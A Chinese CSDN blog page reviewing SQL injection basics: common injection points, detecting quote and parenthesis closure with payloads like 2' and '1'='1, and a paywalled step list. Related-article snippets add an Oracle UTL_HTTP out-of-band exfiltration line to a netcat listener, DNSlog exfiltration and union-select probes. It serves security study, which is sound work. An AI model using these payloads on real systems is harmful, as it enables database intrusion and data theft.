Sql注入基础复习

最新推荐文章于 2024-04-08 19:05:06 发布
VIP文章 最新推荐文章于 2024-04-08 19:05:06 发布
阅读量219 收藏
点赞数
分类专栏: # web安全 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49283465/article/details/127321464
版权

Sql注入基础复习

  • 有赞点赞,没赞请看完后补票…
  • 此文章为干货,但务必实战,自主搭建靶场sql-labs供使用
  • (http://47.94.22.226/sqli-labs/)

SQL 注入经常出现的地方

(用户输入数据和后端数据库产生交互的地方)

  • 内部实现 / 流程的角度

url 传参、表单 post、Cookie、User-Agent、X-Forwarded-For…

  • 常用业务点注入

新闻 / 商品等查询处、用户注册 / 登陆处、修改用户资料时、找回密码处、搜索框…

判断闭合方式–有回显和无回显

闭合方式’ " () (‘x’) ((‘x’)) (“x”) ((“x”)) (()) ‘%x%’-------
(创造错误,使用转义字符或大数等,无法判断闭合方式时,要多方面求证)
有回显:
2’ and ‘1’=‘1,若返回结果为id=2时的值,则说明注入类型为’,若返回结果为id=1时的值,说明注入类型为’)
原因:注入类型为’时,所构造的sql语句为’2’ and ‘1’=‘1’,返回的值为’2’,所以所查询的结果为id=2。注入类型为’)时,所构造的sql语句为(‘2’ and ‘1’=‘1’),这时会把括号内的值当做布尔值处理。括号内的值为0,最终返回id=1(数字型和字符型的根本在于闭合方式不同,还是在于探究闭合方式)
无回显:(排除法,一些典型特征闭合方式基本固定)
搜索select * from table1 where username like ‘% x %’;
插入数据insert into table1 (username,password,xx1,xx2) values(‘zj’,‘123’,‘xx1’,‘xx2’);

Sql注入的基本步骤

* 步骤1:

推断数据库语法大概是什么(通过确认语法才能判断大概的闭合方式)
查询、POST、GET、插入
例如查询语法:
select * from [某个表] where id = [参数]

最低0.47元/天 解锁文章
愚者?
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
26-3 SQL注入攻击 - SQL注入无回显,盲注又被封怎么办?
weixin_43263566的博客
03-11 307
UNC路径的格式类似于。基于时间的盲注可以通过构造特定的SQL语句来判断条件是否成立,从而推测出数据库中的数据。盲注速度较慢且容易被WAF或防火墙封禁IP,因此利用DNSlog可以快速有效地获取数据,避免IP被封锁的情况。通过以上步骤,可以利用 DNSLog 平台或自行部署DNSLog来获取命令执行的回显信息,这在某些情况下可能用于安全测试或网络监控等需要的场景。需要注意的是,DNS查询过程中涉及到本地DNS服务器、根DNS服务器以及顶级域名服务器等不同级别的DNS服务器,通过逐级查询最终完成域名解析。
2024年SQL语句常考面试题(干货满满).zip
03-16
sql语句**SQL面试题集锦:2024年必备指南** **内容概要:** 本文为你提供了2024年最全面的SQL面试题集锦,覆盖了从基础到高级的各类SQL知识点。内容涉及SQL的定义、数据库类型、SQL语言的不同分类(DDL、DML、DCL)、连接类型(内连接、左连接等)、索引的作用和原理、事务的概念及其ACID特性、SQL注入的防护、存储过程与函数的区别、触发器的功能、视图的使用场景,以及更高级的话题如自连接、窗口函数、递归查询、CTEs、索引合并、物化视图、分区表、乐观锁和悲观锁等。 **适用人群:** 本指南适合所有准备参加数据库或相关技术职位的面试者,尤其是那些寻求成为数据库管理员、数据库开发者、数据分析师或数据工程师的候选人。 **使用场景及目标:** 这些面试题适用于面试准备阶段,帮助候选人复习和巩固SQL知识,提高解决实际数据库问题的能力。目标是帮助面试者更好地应对技术面试中可能遇到的SQL相关问题,提升面试成功率。 **其他说明:** 虽然本文提供了一系列实用的SQL面试题,但真正的掌握还需要结合实际操作和项目经验。建议读者在准备面试的同时,通过实际项目或模拟环境来应
基于错误回显的SQL注入整理
12-14
由于复习,停了好几天,换换模式做了一下关于错误回显的ctf题目,首先附上题目:here   整理了一下网上的一些关于错误回显的方法,在这里不带上地址了,请大牛们原谅:P   0x00 关于错误回显   用我自己的话来讲,基于错误回显的sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。   0x01  用于错误回显的sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候会补充)   第一种:  基于 rand()  与  group by 的错误  
sql注入无回显应用情况
最新发布
weixin_74182283的博客
04-08 900
load_file为攻击的相关函数,利用concat函数将查询的version与使用的域名包含起来,其中‘\\\\’为转义字符,可以理解为转义\,输出两个\\ ,而使用\的原因也是为了模仿UNC的路径,后面那个.xxx为域名解析,而那个test则是随便输的一个文件,可以是不存在的,只是为了让查询的数据回显到dnslog上。盲注速度很慢,有时候需要一个一个字符去进行爆破,可以但不够高效,并且有时候防火墙还回去禁用ip,此时就可以考虑通过DNSLOG来快速的得到数据。站库分离(这是个作业,老师给的压缩包。
DVWA环境里,普通SQL注入没错误回显原因
qq_43309162的博客
02-24 1416
DVWA环境里,普通SQL注入没错误回显的原因,即使不是盲注也没有回显,心态崩了啊。
sql注入之查询方法和报错盲注 (16)
san3144393495的博客
04-24 618
当我们进行注入的时候,有很多注入会出现无回显得情况,就在注入的时候没有报错信息和一些东西给予提示的,这种情况是无回显,在前期的注入就没办法执行,我们需要他报出相关的数字,便于我们查询一些参数,如果出现无回显的情况就没变过进行了。出现这个无回显的原因,可能是sql查询方式有问题所导致的, 第二个原因是对方在sql语句执行之后这个结果显示它有一些显示上面的代码,他这个显示代码写的不当,不好,或者直接没写,也会导致这种无回显。一般结合表名和列名进行数据排序操作。会员或后台数据同步或缓存操作。
SQL注入(MySQL查询语句、URL编码、无回显)
Hardworking666的博客
01-05 1882
文章目录MySQL常用查询语句注释URL编码 MySQL常用查询语句 select user(); 当前MySQL 登录用户名 select database(); 当前MySQL 数据库名 select version(); 当前MySQL 版本 select @@version; 当前MySQL 版本 select @@basedir; 当前MySQL 安装路径(MySQL安装目录) select(length..
SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 6388
SQL注入-无回显】
网络安全复习.docx
06-09
怎样设置防火墙过滤规则防I匕漏洞岀现: 开启 (l) SQL注入拦截 HTTP行为限制,只允许HEAD / GET / POST三个HTTP行为动作 限制URL长度,防止URL溢出攻击 (4) URL 滤拦藏,过滤特殊行为的URL 10.画出 个通用型网络安全...
网络信息安全复习题.doc
07-14
A 网络窃听 B 网络扫描 C ICMP风暴 D SQL注入攻击 7、在网络协议实现中缺少加密处理,将导致的安全威胁是( )。 A 缓冲区溢出 B 网络窃听 C DoS D DDoS 8 攻击者利用nmap工具获取目标机信息,则攻击者所利用的方法...
FE-Review:前端知识点复习
03-14
JavaScript部分实现CORS TCP三次握手,四次挥手 网络存储深浅拷贝 调用,应用和绑定实现 新实现类数组和参数创建对象方式继承方式节流和防抖 XSS,CSRF,SQL注入 cookie和SameSite HTTP状态码 Http和Https 网络套接...
SQL注入-无回显】时间盲注:原理、函数、利用过程
06-14 5233
SQL注入-无回显】
sql注入之页面不能回显(外带,Oracle)
weixin_42478365的博客
09-29 901
很多时候页面不能直接回显,如果是oracle数据库可以用UTL_HTTP将数据反弹到一个外网IP进行查看,具体步骤,如下: 第一步:使用nc监听数据 nc -lvvp 8888 第二步:反弹数据信息 and UTL_HTTP("http://IP:8888/" || (SQL语句))=1-- 判断是否存在UTL_HTTP select count(*) from all_objects where object_name="UTL_HTTP" ...
dvwa-sql注入
m0_64987233的博客
07-03 91
代码审计:SELECT first_name, last_name FROM users WHERE user_id = '$id'输入:1' union select user(),database()#输入1' and 1=2# 没有反应。发现查到3时报错了,说明只有两列。输入1' and 1=1#
SQL注入无回显,利用DNSlog构造方式
m0_62207482的博客
03-17 290
防火墙的存在,容易被封禁 IP,可以尝试调整请求频率,有条件的使用代理池进行请求。
SQL注入漏洞基础(三)
qq_59611876的博客
12-16 456
只要这个程序是人写的,那么一定会存在SQL注入的点。当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
sql注入,布尔盲注和时间盲注,无回显
weixin_71008408的博客
01-31 476
这行代码的意思是 截取数据库中第一个字段的长度,并转换为asc码与100比较,我们知道我们数据库名 security ,第一个是s,通过asc码转换值应为115,所以符合,大家可以更改比较数值,去尝试查看超过115,会不会错误不显示。通过order by分组可以看到,如果正确会i显示you are in,错误则无任何提示,由此可以判断出,目前只显示对错,此外前端不会显示任何数据。但是数据库名,表名,列名每个至少有6,7个字母,挨个猜效率肯定很低,所以python启动!
sql注入之回显注入
maluxiao123的博客
03-22 3754
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入、报错注入、bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入。 回显注入需要依靠页面具有数据库查询出内容,使用注入来替换掉本身应该显示的内容来进行攻击的。比如在靶场sqli-labs的第二关中页面查询的内容是通过传入的id=2来控制的 当id=0时,数据库没有id=0的内容,所以就不返回任何数据 我们可以看他的后台查询语句 查询了users表
CTFSQL注入基础知识
04-03
下面是CTF中SQL注入基础知识: 1. 什么是SQL注入SQL注入是指攻击者通过在应用程序的输入中插入恶意的SQL代码,从而绕过应用程序的验证和过滤机制,进而执行非法的数据库操作。攻击者可以通过SQL注入获取敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值